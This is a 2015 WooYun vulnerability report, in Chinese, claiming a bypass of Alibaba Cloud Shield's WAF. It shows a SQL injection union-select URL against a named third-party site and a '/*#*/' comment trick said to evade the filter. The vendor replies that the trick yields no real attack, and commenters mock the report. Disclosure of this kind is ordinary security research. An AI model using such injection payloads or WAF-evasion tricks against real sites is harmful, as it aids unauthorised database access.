当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0106377

漏洞标题:阿里云盾防御bypass

相关厂商:阿里巴巴

漏洞作者: 路人甲

提交时间:2015-04-07 15:15

修复时间:2015-04-07 17:22

公开时间:2015-04-07 17:22

漏洞类型:设计缺陷/逻辑错误

危害等级:低

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-07: 细节已通知厂商并且等待厂商处理中
2015-04-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

bypass.

详细说明:

http://www.alijijinhui.org/index.php?id=1

以下字符可以绕过:
/*#*/
输入如下URL时,

http://www.alijijinhui.org/index.php?id=1 union/**/select 1,2,3,4 from admin %23

b1-1.png

可以看到请求被云盾WAF阻断。当union和select之间输入/*#*/时,成功突破waf发送到web端。

b1-2.png

漏洞证明:

已证明。

修复方案:

完善防御规则。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-07 17:22

厂商回复:

您好,您所报告的问题,经过后端工程师确认不存在安全隐患。由于“#”字符的特殊性,会注释截断后面的SQL语句,所以整个url到/*就结束了,“攻击”特征不足以触发云盾WAF防御策略,也无法产生实际攻击。如果您对云盾有其他任何好的建议,请随时在ASRC报告,我们会第一时间响应。感谢你对我们的支持与关注。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-04-08 16:02 | xsser_w ( 普通白帽子 | Rank:112 漏洞数:33 | 哎)

    哈哈哈哈 对不起 我笑了

  2. 2015-05-08 17:05 | sql小神 ( 路人 | Rank:19 漏洞数:4 | 有些漏洞可以提,有些漏洞不可以提。)

    下次你去提交给asrc看看什么反应